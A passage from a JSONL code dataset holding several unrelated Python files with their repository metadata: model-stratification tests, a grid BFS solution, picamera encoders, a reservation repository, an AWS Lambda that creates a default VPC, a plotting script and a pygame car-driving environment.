[\"standard_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n [\n \"standard_flows\",\n \"flow_0Xtest_foo\",\n \"susceptibleXtest_foo\",\n \"infectiousXtest_foo\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_0Xtest_bar\",\n \"susceptibleXtest_bar\",\n \"infectiousXtest_bar\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_1\",\n \"infectiousXtest_foo\",\n \"susceptibleXtest_foo\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_1\",\n \"infectiousXtest_bar\",\n \"susceptibleXtest_bar\",\n 1,\n None,\n None,\n ],\n ],\n # Expected custom funcs\n {},\n # Expected params\n {\"flow_0\": 0.5, \"flow_1\": 0.1, \"flow_0Xtest_foo\": 0.2, \"flow_0Xtest_bar\": 0.7},\n ],\n # Same as above but only stratify one compartment\n [\n # Starting flows\n [\n [\"standard_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"standard_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n ],\n # Starting custom flow funcs\n {},\n # Starting params\n {\"flow_0\": 0.5, \"flow_1\": 0.1,},\n # Adjustments\n {\"flow_0\": {\"foo\": 0.2, \"bar\": 0.7,}},\n # Compartments to stratify\n [\"susceptible\"],\n # Expected flows\n [\n [\"standard_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"standard_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n [\n \"standard_flows\",\n \"flow_0Xtest_foo\",\n \"susceptibleXtest_foo\",\n \"infectious\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_0Xtest_bar\",\n \"susceptibleXtest_bar\",\n \"infectious\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_1Xtest_foo\",\n \"infectious\",\n \"susceptibleXtest_foo\",\n 1,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"flow_1Xtest_bar\",\n \"infectious\",\n \"susceptibleXtest_bar\",\n 1,\n None,\n None,\n ],\n ],\n # Expected custom funcs\n {},\n # Expected params\n {\n \"flow_0\": 0.5,\n \"flow_1\": 0.1,\n \"flow_0Xtest_foo\": 0.2,\n \"flow_0Xtest_bar\": 0.7,\n \"flow_1Xtest_foo\": 0.5,\n \"flow_1Xtest_bar\": 0.5,\n },\n ],\n # Expect custom flow funcs to be updated\n [\n # Starting flow\n [\n [\"customised_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"customised_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n [\"customised_flows\", \"flow_2\", \"comp_0\", \"comp_1\", 0, None, None],\n ],\n # Starting custom flow funcs\n {0: \"func_for_flow_0\", 1: \"func_for_flow_1\", 2: \"func_for_flow_2\"},\n # Starting params\n {\"flow_0\": 0.5, \"flow_1\": 0.1, \"flow_2\": 1.9},\n # Adjustments\n {},\n # Compartments to stratify\n [\"susceptible\"],\n # Expected flows\n [\n [\"customised_flows\", \"flow_0\", \"susceptible\", \"infectious\", 0, None, None],\n [\"customised_flows\", \"flow_1\", \"infectious\", \"susceptible\", 0, None, None],\n [\"customised_flows\", \"flow_2\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"customised_flows\", \"flow_0\", \"susceptibleXtest_foo\", \"infectious\", 1, None, None,],\n [\"customised_flows\", \"flow_0\", \"susceptibleXtest_bar\", \"infectious\", 1, None, None,],\n [\n \"customised_flows\",\n \"flow_1Xtest_foo\",\n \"infectious\",\n \"susceptibleXtest_foo\",\n 1,\n None,\n None,\n ],\n [\n \"customised_flows\",\n \"flow_1Xtest_bar\",\n \"infectious\",\n \"susceptibleXtest_bar\",\n 1,\n None,\n None,\n ],\n [\"customised_flows\", \"flow_2\", \"comp_0\", \"comp_1\", 1, None, None],\n ],\n # Expected custom funcs\n {\n 0: \"func_for_flow_0\",\n 1: \"func_for_flow_1\",\n 2: \"func_for_flow_2\",\n 3: \"func_for_flow_0\",\n 4: \"func_for_flow_0\",\n 5: \"func_for_flow_1\",\n 6: \"func_for_flow_1\",\n 7: \"func_for_flow_2\",\n },\n # Expected params\n {\n \"flow_0\": 0.5,\n \"flow_1\": 0.1,\n \"flow_1Xtest_foo\": 0.5,\n \"flow_1Xtest_bar\": 0.5,\n \"flow_2\": 1.9,\n },\n ],\n]\n\n\n@pytest.mark.parametrize(PARAM_VARS, PARAM_VALS)\ndef test_stratify_transition_flows(\n flows,\n custom_func,\n params,\n adjustment,\n comps,\n expected_flows,\n expected_custom_func,\n expected_params,\n):\n \"\"\"\n Ensure that `stratify_compartments` splits up transition flows correctly.\n \"\"\"\n model = StratifiedModel(**_get_model_kwargs())\n cols = [\"type\", \"parameter\", \"origin\", \"to\", \"implement\", \"strain\", \"force_index\"]\n model.transition_flows = pd.DataFrame(flows, columns=cols).astype(object)\n model.parameters = params\n strat_name = \"test\"\n strata_names = [\"foo\", \"bar\"]\n model.customised_flow_functions = custom_func\n model.all_stratifications = {strat_name: strata_names}\n model.stratify_compartments(strat_name, strata_names, {\"foo\": 0.5, \"bar\": 0.5}, comps)\n model.stratify_transition_flows(strat_name, strata_names, adjustment, comps)\n # Check flows df stratified\n expected_flows_df = pd.DataFrame(expected_flows, columns=cols).astype(object)\n assert_frame_equal(expected_flows_df, model.transition_flows)\n # Check custom flow func is updated\n assert model.customised_flow_functions == expected_custom_func\n # Check params are stratified\n for k, v in expected_params.items():\n assert model.parameters[k] == v\n\n\nPARAM_VARS = \"back_one, include_change, all_stratifications, flows, expected_idxs\"\nPARAM_VALS = [\n # Test default case - expect all flow idxs.\n [\n 0,\n False,\n {},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [0, 1],\n ],\n # Test default case, but 1 flow has wrong implement - expect all flow idxs except that one.\n [\n 0,\n False,\n {},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 1, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [1],\n ],\n # Test default case, but 1 strats added yet with back 1 - expect all flow idxs.\n [\n 1,\n False,\n {\"age\": [0, 5, 15, 50]},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [0, 1],\n ],\n # Test default case, but 1 strats added yet no back 1 - expect no flow idxs.\n [\n 0,\n False,\n {\"age\": [0, 5, 15, 50]},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [],\n ],\n # Test default case, but with a strata change flow - expect all flow idxs except strata change flow.\n [\n 0,\n False,\n {},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"strata_change\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [0, 2],\n ],\n # Test default case, but with a strata change flow and 'include change' - expect all flow idxs.\n [\n 0,\n True,\n {},\n [\n [\"standard_flows\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"strata_change\", \"flow_name_0\", \"comp_0\", \"comp_1\", 0, None, None],\n [\"standard_flows\", \"flow_name_1\", \"comp_1\", \"comp_0\", 0, None, None],\n ],\n [0, 1, 2],\n ],\n]\n\n\n@pytest.mark.parametrize(PARAM_VARS, PARAM_VALS)\ndef test_find_transition_indices_to_implement(\n back_one, include_change, all_stratifications, flows, expected_idxs\n):\n \"\"\"\n Ensure `find_transition_indices_to_implement` returns the correct list of indices.\n \"\"\"\n model = StratifiedModel(**_get_model_kwargs())\n cols = [\"type\", \"parameter\", \"origin\", \"to\", \"implement\", \"strain\", \"force_index\"]\n model.transition_flows = pd.DataFrame(flows, columns=cols).astype(object)\n model.all_stratifications = all_stratifications\n actual_idxs = model.find_transition_indices_to_implement(back_one, include_change)\n assert expected_idxs == actual_idxs\n\n\nPARAM_VARS = \"strata,proportions,to_stratify,expected_names,expected_values\"\nPARAM_VALS = [\n # Use 2 strata, expect 2x new compartments, strata split evenly.\n [\n [\"foo\", \"bar\"],\n {\"foo\": 0.5, \"bar\": 0.5},\n [\"susceptible\", \"infectious\"],\n [\n \"susceptibleXtest_foo\",\n \"susceptibleXtest_bar\",\n \"infectiousXtest_foo\",\n \"infectiousXtest_bar\",\n ],\n [450, 450, 50, 50],\n ],\n # Use 2 strata, expect 2x new compartments, strata split unevenly.\n [\n [\"foo\", \"bar\"],\n {\"foo\": 0.1, \"bar\": 0.9},\n [\"susceptible\", \"infectious\"],\n [\n \"susceptibleXtest_foo\",\n \"susceptibleXtest_bar\",\n \"infectiousXtest_foo\",\n \"infectiousXtest_bar\",\n ],\n [90, 810, 10, 90],\n ],\n # Use 2 strata, don't stratify infectious.\n [\n [\"foo\", \"bar\"],\n {\"foo\": 0.5, \"bar\": 0.5},\n [\"susceptible\"],\n [\"infectious\", \"susceptibleXtest_foo\", \"susceptibleXtest_bar\"],\n [100, 450, 450],\n ],\n]\n\n\n@pytest.mark.parametrize(PARAM_VARS, PARAM_VALS)\ndef test_stratify_compartments(strata, proportions, to_stratify, expected_names, expected_values):\n \"\"\"\n Ensure that `stratify_compartments` splits up compartment names and values correctly.\n \"\"\"\n model = StratifiedModel(**_get_model_kwargs())\n model.stratify_compartments(\"test\", strata, proportions, to_stratify)\n assert model.compartment_names == expected_names\n assert model.compartment_values == expected_values\n\n\nPARAM_VARS = \"age_strata,expected_flows,expected_ageing\"\nPARAM_VALS = [\n # Test simple age split, expect ageing to be proprotional to bracket width.\n [\n [0, 50],\n [\n [\n \"standard_flows\",\n \"ageing0to50\",\n \"susceptibleXage_0\",\n \"susceptibleXage_50\",\n 0,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"ageing0to50\",\n \"infectiousXage_0\",\n \"infectiousXage_50\",\n 0,\n None,\n None,\n ],\n ],\n {\"ageing0to50\": 1 / 50},\n ],\n # Test typical age split, expect ageing to be proprotional to bracket width.\n [\n [0, 5, 15, 50],\n [\n [\n \"standard_flows\",\n \"ageing0to5\",\n \"susceptibleXage_0\",\n \"susceptibleXage_5\",\n 0,\n None,\n None,\n ],\n [\"standard_flows\", \"ageing0to5\", \"infectiousXage_0\", \"infectiousXage_5\", 0, None, None],\n [\n \"standard_flows\",\n \"ageing5to15\",\n \"susceptibleXage_5\",\n \"susceptibleXage_15\",\n 0,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"ageing5to15\",\n \"infectiousXage_5\",\n \"infectiousXage_15\",\n 0,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"ageing15to50\",\n \"susceptibleXage_15\",\n \"susceptibleXage_50\",\n 0,\n None,\n None,\n ],\n [\n \"standard_flows\",\n \"ageing15to50\",\n \"infectiousXage_15\",\n \"infectiousXage_50\",\n 0,\n None,\n None,\n ],\n ],\n {\"ageing0to5\": 1 / 5, \"ageing5to15\": 1 / 10, \"ageing15to50\": 1 / 35,},\n ],\n]\n\n\n@pytest.mark.parametrize(PARAM_VARS, PARAM_VALS)\ndef test_set_ageing_rates(age_strata, expected_flows, expected_ageing):\n \"\"\"\n Ensure that `set_ageing_rates` adds ageing flows to the transition flows dataframe\n \"\"\"\n model = StratifiedModel(**_get_model_kwargs())\n cols = [\"type\", \"parameter\", \"origin\", \"to\", \"implement\", \"strain\", \"force_index\"]\n # Ensure there are no initial flows\n initial_df = pd.DataFrame([], columns=cols).astype(object)\n assert_frame_equal(initial_df, model.transition_flows)\n # Set ageing rates\n model.set_ageing_rates(age_strata)\n\n # Check ageing flows are set\n expected_df = pd.DataFrame(expected_flows, columns=cols).astype(object)\n assert_frame_equal(expected_df, model.transition_flows)\n # Check ageing params are set\n for k, v in expected_ageing.items():\n assert model.parameters[k] == v\n\n\ndef _get_model_kwargs(**kwargs):\n return {\n \"times\": [2000, 2001, 2002, 2003, 2004, 2005],\n \"compartment_types\": [Compartment.SUSCEPTIBLE, Compartment.INFECTIOUS],\n \"initial_conditions\": {Compartment.INFECTIOUS: 100},\n \"parameters\": {},\n \"requested_flows\": [],\n \"starting_population\": 1000,\n **kwargs,\n }\n","repo_name":"monash-emu/legacy-summer","sub_path":"tests/test_strat_model/test_stratify.py","file_name":"test_stratify.py","file_ext":"py","file_size_in_byte":15888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15088843969","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom queue import Queue\r\n\r\nh,w = map(int,input().split())\r\nblack, white = 0,0\r\ns = [[0] * w for _ in range(h)]\r\nfor i in range(h):\r\n s[i] = list(input())\r\n for j in range(w):\r\n if s[i][j] == \".\":\r\n white += 1\r\n else:\r\n black += 1\r\n\r\ndef bfs():\r\n global ans,checked\r\n while not que.empty():\r\n xy = que.get()\r\n if xy[0] == w - 1 and xy[1] == h - 1:\r\n ans = checked[xy[1]][xy[0]]\r\n return\r\n for i in range(-1,2):\r\n for j in range(-1,2):\r\n if i == j or i == -j:\r\n continue\r\n if 0 <= xy[0] + i < w and 0 <= xy[1] + j < h:\r\n if checked[xy[1] + j][xy[0] + i] == -1 and s[xy[1] + j][xy[0] + i] == \".\":\r\n checked[xy[1] + j][xy[0] + i] = checked[xy[1]][xy[0]] + 1\r\n que.put([xy[0] + i,xy[1] + j])\r\n\r\nque = Queue()\r\nans = -1\r\nchecked = [[-1] * w for _ in range(h)]\r\nchecked[0][0] = 0\r\nque.put([0,0])\r\n\r\nbfs()\r\nif ans != -1:\r\n print(white - ans - 1)\r\nelse:\r\n print(-1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc088/D/4896129.py","file_name":"4896129.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"22011499970","text":"#!/usr/bin/python3\n\"\"\"This module contains\n =>write_file\n\"\"\"\n\n\ndef write_file(filename=\"\", text=\"\"):\n \"\"\"This function writes a string into txt file\n \"\"\"\n nb = 0\n with open(filename, 'w', encoding=\"utf-8\") as f:\n nb = f.write(text)\n return nb\n","repo_name":"afissama/alx-higher_level_programming","sub_path":"0x0B-python-input_output/1-write_file.py","file_name":"1-write_file.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32566271619","text":"from __future__ import division\n\nimport ctypes\nimport threading\nfrom io import BytesIO\nfrom picamera import mmal, mmalobj\nfrom threading import Event\n\ngpulock = threading.Lock()\n\nclass Resize_YUV():\n def __init__(self):\n self.resizer = mmalobj.MMALResizer()\n self.finished = Event()\n self.output = None\n\n def _callback(self, port, buf):\n finished = bool(buf.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END)\n if finished is True:\n with buf as data:\n if self.output is None:\n self.output = bytes(data)\n else:\n self.output.write(data)\n self.finished.set()\n return finished\n\n def resize(self, YUV_DATA, from_size, to_size, output= None):\n gpulock.acquire()\n result = None\n try:\n if type(output) == str:\n self.output = open(output, \"wb\")\n\n self.resizer.inputs[0].format = mmal.MMAL_ENCODING_I420\n self.resizer.inputs[0].framesize = from_size\n self.resizer.inputs[0].commit()\n self.resizer.inputs[0].enable(lambda port, buf: True)\n\n self.resizer.outputs[0].format = mmal.MMAL_ENCODING_I420\n self.resizer.outputs[0].framesize = to_size\n self.resizer.outputs[0].commit()\n self.resizer.outputs[0].enable(self._callback)\n\n buf = self.resizer.inputs[0].get_buffer()\n buf.data = YUV_DATA\n self.resizer.inputs[0].send_buffer(buf)\n\n if not self.finished.wait(30):\n raise Exception('resizer timed out')\n\n if type(output) == str:\n self.output.close()\n else:\n result = self.output\n self.output = None\n finally:\n self.resizer.outputs[0].disable()\n self.resizer.inputs[0].disable()\n self.finished.clear()\n gpulock.release()\n return result\n\nclass YUV_to_JPEG():\n def __init__(self):\n self.encoder = mmalobj.MMALImageEncoder()\n self.finished = Event()\n self.output = None\n\n def _callback(self, port, buf):\n finished = bool(buf.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END)\n if finished is True:\n with buf as data:\n if self.output is None:\n self.output = bytes(data)\n else:\n self.output.write(data)\n self.finished.set()\n return finished\n\n def encode(self, YUV_DATA, framesize, quality, output= None):\n gpulock.acquire()\n result = None\n try:\n if type(output) == str:\n self.output = open(output, \"wb\")\n\n self.encoder.inputs[0].format = mmal.MMAL_ENCODING_I420\n self.encoder.inputs[0].framesize = framesize\n self.encoder.inputs[0].commit()\n self.encoder.inputs[0].enable(lambda port, buf: True)\n\n self.encoder.outputs[0].copy_from(self.encoder.inputs[0])\n self.encoder.outputs[0].format = mmal.MMAL_ENCODING_JPEG\n self.encoder.outputs[0].params[mmal.MMAL_PARAMETER_JPEG_Q_FACTOR] = quality\n self.encoder.outputs[0].framesize = framesize\n self.encoder.outputs[0].commit()\n self.encoder.outputs[0].enable(self._callback)\n\n buf = self.encoder.inputs[0].get_buffer()\n buf.data = YUV_DATA\n self.encoder.inputs[0].send_buffer(buf)\n\n if not self.finished.wait(30):\n raise Exception('encode timed out')\n\n if type(output) == str:\n self.output.close()\n else:\n result = self.output\n self.output = None\n finally:\n self.encoder.outputs[0].disable()\n self.encoder.inputs[0].disable()\n self.finished.clear()\n gpulock.release()\n return result\n\n\n_resize_YUVInstance = None\ndef Resize_YUVInstance():\n global _resize_YUVInstance\n if _resize_YUVInstance is None:\n _resize_YUVInstance = Resize_YUV()\n return _resize_YUVInstance\n\n\n_YUV_to_JPEGInstance = None\ndef YUV_to_JPEGInstance():\n global _YUV_to_JPEGInstance\n if _YUV_to_JPEGInstance is None:\n _YUV_to_JPEGInstance = YUV_to_JPEG()\n return _YUV_to_JPEGInstance\n","repo_name":"dirk-makerhafen/openpi3dscan","sub_path":"client/src/gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19340434875","text":"from sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import Session\nfrom app.reservations.models import Reservation\nfrom app.reservations.exceptions import ReservationNotFoundException\n\n\nclass ReservationRepository:\n\n def __init__(self, db: Session):\n self.db = db\n\n def create_reservation(self, ticket_id, user_id):\n \"\"\"\n It creates a new reservation for a ticket and user\n @param ticket_id - The id of the ticket that is being reserved.\n @param user_id - The id of the user who is making the reservation.\n @returns A reservation object\n \"\"\"\n try:\n reservation = Reservation(ticket_id=ticket_id, user_id=user_id)\n self.db.add(reservation)\n self.db.commit()\n self.db.refresh(reservation)\n return reservation\n except IntegrityError as e:\n raise e\n except Exception as e:\n raise e\n\n def read_all_reservations(self):\n \"\"\"\n It returns all the reservations in the database\n @returns A list of all reservations in the database.\n \"\"\"\n reservations = self.db.query(Reservation).all()\n return reservations\n\n def read_reservation_by_id(self, reservation_id: str):\n \"\"\"\n It returns a reservation object from the database if it exists, otherwise it raises an exception\n @param {str} reservation_id - The ID of the reservation to be read.\n @returns The reservation object is being returned.\n \"\"\"\n reservation = self.db.query(Reservation).filter(Reservation.reservation_id == reservation_id).first()\n if reservation is None:\n raise ReservationNotFoundException(f\"Flight with provided ID: {reservation_id} not found.\", 400)\n return reservation\n\n def delete_reservation(self, reservation_id: str):\n \"\"\"\n It deletes a reservation from the database\n @param {str} reservation_id - The ID of the reservation to be deleted.\n @returns True\n \"\"\"\n try:\n reservation = self.db.query(Reservation).filter(Reservation.reservation_id == reservation_id).first()\n if reservation is None:\n raise ReservationNotFoundException(f\"Reservation with provided ID: {reservation_id} not found.\", 400)\n self.db.delete(reservation)\n self.db.commit()\n return True\n except Exception as e:\n raise e\n","repo_name":"nemanja-stankovic/PROJEKAT-II","sub_path":"app/reservations/repositories/reservation_repository.py","file_name":"reservation_repository.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17827237250","text":"import boto3\nimport json\nimport logging\nimport urllib3\n\nhttp = urllib3.PoolManager()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndef lambda_handler(event, context):\n logger.info(event)\n client = boto3.client('ec2')\n \"\"\" Get VPC list \"\"\"\n response = client.describe_vpcs()\n vpclist = response.get('Vpcs')\n\n \"\"\" Flag to track if the default vpc exists \"\"\"\n hasdefault = False\n\n \"\"\" Iterate over dict of VPCs and check to see if we have a default VPC \"\"\"\n for vpcs in vpclist:\n \"\"\" Search for IsDefault value in vpcs list \"\"\"\n if 'IsDefault' in vpcs:\n vpcname = vpcs.get(\"VpcId\")\n print (\"VPC: %s\" % vpcname)\n isd = vpcs.get(\"IsDefault\")\n print (\"IsDefault value: %s\" % isd)\n if isd:\n \"\"\" Region has the default vpc - set flag to True \"\"\"\n hasdefault = True\n break\n\n print (\"Has default: %s\" % hasdefault)\n \"\"\" Create default VPC and associated networking \"\"\"\n if not hasdefault:\n print (\"We need to create the default vpc\")\n try:\n response = client.create_default_vpc()\n print (response)\n except Exception as error:\n print (error)\n response_value = int(event['ResourceProperties']['Input']) * 5\n response_data = {}\n response_data['Data'] = response_value\n send_response(event, context, \"SUCCESS\", \"Default VPC Created\", response_data)\n\ndef send_response(event, context, status, reason, data):\n body = json.dumps({\n \"Status\": status,\n \"Reason\": reason,\n \"PhysicalResourceId\": context.log_stream_name,\n \"StackId\": event.get(\"StackId\"),\n \"RequestId\": event.get(\"RequestId\"),\n \"LogicalResourceId\": event.get(\"LogicalResourceId\"),\n \"NoEcho\": False,\n \"Data\": data\n })\n http.request(\n \"PUT\",\n event.get(\"ResponseURL\"),\n body=body,\n headers={\n \"Content-Type\": \"\",\n \"Content-Length\": str(len(body))\n }\n )\n","repo_name":"mvillafuertem/spark","sub_path":"modules/map-reduce/src/main/scala/io/github/mvillafuertem/map/reduce/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39811837722","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n###-------------------------------------------------------------------\n### File : postprocessor.py\n### Author : Oleg Baskakov\n### Description : postprocessor show result\n###\n### 2011. Written for Moscow Aviation Institute.\n###-------------------------------------------------------------------\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\n\n\n#=====================================================================\n\ndef main():\n\ttry:\n\t\tk = int(sys.argv[1])\n\texcept:\n\t\tk = 0\n\t\n\tif len(sys.argv) <= 1:\n\t\tf = open(\"result\")\n\t\tdd = eval(f.read())\n\t\tY = dd['tmp']\n\t\tX = list(range(len(Y)))\n\t\tplt.plot(X, Y, color=\"black\")\n\t\tplt.show()\n\t\treturn\n\t\n\t\n\t\n\t\n\tprint(\"k =\", k)\n\n\tf = open(\"result\")\n\tdd = eval(f.read())\n\tres = dd['result']\n\tif dd.has_key('grid'):\n\t\tgrid = dd['grid']\n\telse:\n\t\tgrid = range(len(res))\n\t\n\tif dd.has_key('origin'):\n\t\torigin = dd['origin']\n\t\tplt.plot(grid, origin[k], color=\"blue\")\n\n\tplt.plot(grid, res[k], color=\"red\")\n\n\tplt.show()\n\n\t\n\t\n\t\n#=====================================================================\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n","repo_name":"spetz911/CM","sub_path":"lab5/postprocessor.py","file_name":"postprocessor.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22161109611","text":"import pygame\nimport math\n\nscreenWidth = 900\nscreenHeight = 900\ncheckPoints = ((800, 100), (800, 280), (450, 350), (810, 430), (750, 810), (550, 540), \n (380, 810), (70, 500), (130, 80), (260, 450), (100, 100))\n\ndef getDistance(p1, p2):\n\treturn math.sqrt(math.pow((p1[0] - p2[0]), 2) + math.pow((p1[1] - p2[1]), 2))\n\ndef rotateCenter(image, angle):\n originalRect = image.get_rect()\n rotateIMG = pygame.transform.rotate(image, angle)\n rotateRect = originalRect.copy()\n rotateRect.center = rotateIMG.get_rect().center\n rotateIMG = rotateIMG.subsurface(rotateRect).copy()\n return rotateIMG\n\nclass Car:\n def __init__(self, carIMG, trackIMG, pos):\n self.car = pygame.image.load(carIMG)\n self.track = pygame.image.load(trackIMG)\n self.car = pygame.transform.scale(self.car, (65, 65))\n self.rotateCar = self.car\n self.pos = pos\n self.angle = 0\n self.speed = 0\n self.center = [self.pos[0] + 50, self.pos[1] + 50]\n self.eyes = []\n self.backEyes = []\n self.alive = True\n self.checkPoint = 0\n self.prevDistance = 0\n self.currentDistance = 0\n self.finish = False\n self.checkFlag = False\n self.distance = 0\n self.time = 0\n\n for d in range(-90, 120, 45):\n self.checkEyes(d)\n self.checkBackEyes(d)\n\n #Draws current car state to screen\n def draw(self, screen):\n screen.blit(self.rotateCar, self.pos)\n\n # Checks which eyes should be drawn\n def checkEyes(self, degrees):\n len = 0\n x = int(self.center[0] + math.cos(math.radians(360 - (self.angle + degrees))) * len)\n y = int(self.center[1] + math.sin(math.radians(360 - (self.angle + degrees))) * len)\n\n while not self.track.get_at((x, y)) == (0, 0, 0, 255):\n len = len + 1\n x = int(self.center[0] + math.cos(math.radians(360 - (self.angle + degrees))) * len)\n y = int(self.center[1] + math.sin(math.radians(360 - (self.angle + degrees))) * len)\n\n dist = int(math.sqrt(math.pow(x - self.center[0], 2) + math.pow(y - self.center[1], 2)))\n self.eyes.append([(x, y), dist])\n\n #Checks which eyes should be drawn in the back\n def checkBackEyes(self, degrees):\n len = 0\n x = int(self.center[0] - math.cos(math.radians(360 - (self.angle + degrees))) * len)\n y = int(self.center[1] - math.sin(math.radians(360 - (self.angle + degrees))) * len)\n\n while not self.track.get_at((x, y)) == (0, 0, 0, 255):\n len = len + 1\n x = int(self.center[0] - math.cos(math.radians(360 - (self.angle + degrees))) * len)\n y = int(self.center[1] - math.sin(math.radians(360 - (self.angle + degrees))) * len)\n\n dist = int(math.sqrt(math.pow(x - self.center[0], 2) + math.pow(y - self.center[1], 2)))\n self.backEyes.append([(x, y), dist])\n \n #Draws 9 eyes in front of car\n def drawEyes(self, screen):\n for r in self.eyes:\n pos, dist = r\n pygame.draw.line(screen, (255, 255, 0), self.center, pos, 1)\n pygame.draw.circle(screen, (255, 255, 0), pos, 5)\n for r in self.backEyes:\n pos, dist = r\n pygame.draw.line(screen, (255, 255, 0), self.center, pos, 1)\n pygame.draw.circle(screen, (255, 255, 0), pos, 5)\n\n #Check for collision using colours\n def checkCollision(self):\n self.alive = True\n for p in self.corners:\n if self.track.get_at((int(p[0]), int(p[1]))) == (0, 0, 0, 255):\n self.alive = False\n break\n\n #Check if car reached a checkpoint\n def checkCheckPoint(self):\n p = checkPoints[self.checkPoint]\n self.prevDistance = self.currentDistance\n dist = getDistance(p, self.center)\n if dist < 70:\n self.checkPoint += 1\n self.prevDistance = 9999\n self.checkFlag = True\n if self.checkPoint >= len(checkPoints):\n self.checkPoint = 0\n self.finish = True\n else:\n self.finish = False\n\n self.currentDistance = dist\n\n #Car actions and updates\n def update(self):\n #check speed\n self.speed -= 0.5\n if self.speed > 5:\n self.speed = 5\n if self.speed < 0.5:\n self.speed = 0.5\n\n #check position\n self.rotateCar = rotateCenter(self.car, self.angle)\n self.pos[0] += math.cos(math.radians(360 - self.angle)) * self.speed\n\n self.distance += self.speed\n self.time += 1\n self.pos[1] += math.sin(math.radians(360 - self.angle)) * self.speed\n\n # caculate 4 collision points\n self.center = [int(self.pos[0]) + 32.5, int(self.pos[1]) + 32.5]\n len = 20\n LT = [self.center[0] + math.cos(math.radians(360 - (self.angle + 30))) * len, self.center[1] + math.sin(math.radians(360 - (self.angle + 30))) * len]\n RT = [self.center[0] + math.cos(math.radians(360 - (self.angle + 150))) * len, self.center[1] + math.sin(math.radians(360 - (self.angle + 150))) * len]\n LB = [self.center[0] + math.cos(math.radians(360 - (self.angle + 210))) * len, self.center[1] + math.sin(math.radians(360 - (self.angle + 210))) * len]\n RB = [self.center[0] + math.cos(math.radians(360 - (self.angle + 330))) * len, self.center[1] + math.sin(math.radians(360 - (self.angle + 330))) * len]\n self.corners = [LT, RT, LB, RB]\n\nclass CarAI:\n def __init__(self, render = True):\n pygame.init()\n self.screen = pygame.display.set_mode((screenWidth, screenHeight))\n self.clock = pygame.time.Clock()\n self.font = pygame.font.Font('freesansbold.ttf', 25)\n self.car = Car('images/car.png', 'images/track-border.png', [400, 50])\n self.game_speed = 60\n self.render = render\n self.mode = 0\n self.backgroundIMG = pygame.image.load(\"images/background.png\")\n self.background = pygame.transform.smoothscale(self.backgroundIMG, (screenWidth, screenHeight))\n self.trackIMG = pygame.image.load(\"images/track.png\")\n self.track = pygame.transform.smoothscale(self.trackIMG, (screenWidth, screenHeight))\n\n def action(self, action):\n if action == 0:\n self.car.speed += 2\n if action == 1:\n self.car.angle += 5\n elif action == 2:\n self.car.angle -= 5\n\n self.car.update()\n self.car.checkCollision()\n self.car.checkCheckPoint()\n\n self.car.eyes.clear()\n self.car.backEyes.clear()\n for d in range(-90, 120, 45):\n self.car.checkEyes(d)\n self.car.checkBackEyes(d)\n\n def evaluate(self):\n reward = 0\n if not self.car.alive:\n reward = -10000 + self.car.distance - (self.car.time/8)\n\n elif 